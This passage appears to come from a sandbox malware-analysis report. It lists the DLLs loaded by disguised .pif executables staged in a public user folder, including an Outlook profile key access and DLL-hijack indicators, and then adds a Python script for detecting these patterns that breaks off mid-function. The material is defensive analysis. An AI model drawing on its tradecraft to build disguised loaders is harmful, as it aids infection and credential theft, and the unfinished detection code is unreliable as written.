            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: rasadhlp.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: fwpuclnt.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: secur32.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: sspicli.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: schannel.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: mskeyprotect.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: ntasn1.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: ncrypt.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: ncryptsslp.dll
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Section loaded: dpapi.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: apphelp.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: version.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: uxtheme.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: url.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: ieframe.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: iertutil.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: netapi32.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: userenv.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: winhttp.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: wkscli.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: netutils.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: windows.storage.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: wldp.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: propsys.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: amsi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: smartscreenps.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: winmm.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: wininet.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: profapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppc.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ???.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ???.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ???.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: am.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ??l.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ??l.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ?.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ?.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ??l.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ????.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ???e???????????.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ???e???????????.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ?.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ?.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ?.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ?.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ??l.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: ??l.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppc.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppc.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppc.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppc.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: tquery.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: cryptdll.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: spp.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: vssapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: vsstrace.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: spp.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: vssapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: vsstrace.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: endpointdlp.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: endpointdlp.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: endpointdlp.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: endpointdlp.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: advapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: advapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: advapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: advapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: advapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: advapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: advapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: spp.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: vssapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: vsstrace.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppwmi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: slc.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppc.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppcext.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppc.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: winscard.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: devobj.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppc.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFSection loaded: sppc.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: wldp.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: amsi.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: userenv.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: profapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: version.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: rasman.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: secur32.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: schannel.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: version.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: uxtheme.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: url.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: ieframe.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: iertutil.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: netapi32.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: userenv.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: winhttp.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: wkscli.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: netutils.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: windows.storage.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: wldp.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: kernel.appcore.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: propsys.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: amsi.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: smartscreenps.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: winmm.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: wininet.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: sspicli.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: profapi.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: mswsock.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: ieproxy.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: ieproxy.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: iphlpapi.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: ieproxy.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: msasn1.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: msasn1.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: msasn1.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: mssip32.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: msasn1.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: mssip32.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: msasn1.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: mssip32.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: msasn1.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: winnsi.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: sppc.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section loaded: am.dll
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: INQUIRY LIST 292.vbs | Static file information: File size 1139043 > 1048576
            Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000001.00000003.1825875616.000000007F62F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: easinvoker.pdb source: x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1825651514.000000007F650000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.00000000204BF000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.1.dr
            Source: Binary string: _.pdb source: liuuazhU.pif, 00000006.00000002.3110746880.000000001E421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000003.1856725712.000000001B37A000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3108782055.000000001CFF6000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109265688.000000001D3A0000.00000004.08000000.00040000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3118421537.000000002BD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp, liuuazhU.pif, 0000000B.00000003.1986218044.0000000028CFF000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3109591892.000000001C560000.00000004.08000000.00040000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3109192607.000000001C136000.00000004.00000020.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3111207326.000000001D7F1000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000003.2056284697.000000001A55C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000001.00000003.1848292254.0000000021462000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000003.1848292254.0000000021491000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1825651514.000000007F650000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.00000000204BF000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.1.dr
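The "Section loaded" rows above are the raw material for two checks an analyst otherwise does by eye: which processes run from a user-writable directory under a deceptive extension, and whether any loaded module shares its file name with something the sample itself dropped. Here both Uhzauuil.PIF instances load netutils.dll right after netapi32.dll and wkscli.dll, and a NETUTILS.dll appears among the dropped files further down, which is the DLL search-order hijack pattern the report flags. The following Python is an added example, not part of the Joe Sandbox report: it parses rows in the report's own flattened format, the first six sample rows are copied from the report, the wscript.exe row is constructed as a benign control, the dropped-file list is taken from the report's ".dr" entries, and the "very short name" threshold is a heuristic of this example rather than a sandbox rule.

```python
"""Turn Joe Sandbox 'Section loaded' rows into per-process load sequences and
apply the checks an analyst otherwise does by eye. Standard library only."""
import re
from collections import defaultdict

# The report renders the Source and Description columns run together
# ("...Uhzauuil.PIFSection loaded: ...") and may end with a "Jump to behavior"
# link label; that form and a " | "-separated form are both accepted.
ROW = re.compile(
    r"Source:\s*(?P<proc>.+?)\s*\|?\s*Section loaded:\s*(?P<dll>.+?)(?:Jump to behavior)?\s*$")
DLL_NAME = re.compile(r"[A-Za-z0-9_.\-]+\.dll", re.I)
USER_WRITABLE = (r"c:\users\public", r"\appdata\local\temp", r"\appdata\roaming", r"c:\programdata")
DECEPTIVE_EXT = (".pif", ".scr", ".com", ".cmd")
MIN_STEM = 3  # heuristic threshold for "suspiciously short" module names, not a sandbox rule


def parse_rows(lines):
    """Map process image path -> module names in load order (duplicates kept)."""
    loads = defaultdict(list)
    for line in lines:
        m = ROW.search(line)
        if m:
            loads[m.group("proc")].append(m.group("dll"))
    return dict(loads)


def analyse(lines, dropped_files):
    """dropped_files: names of files the sandbox saw the sample write (basenames suffice).
    Returns (process path, finding) pairs."""
    dropped = {name.lower() for name in dropped_files}
    findings = []
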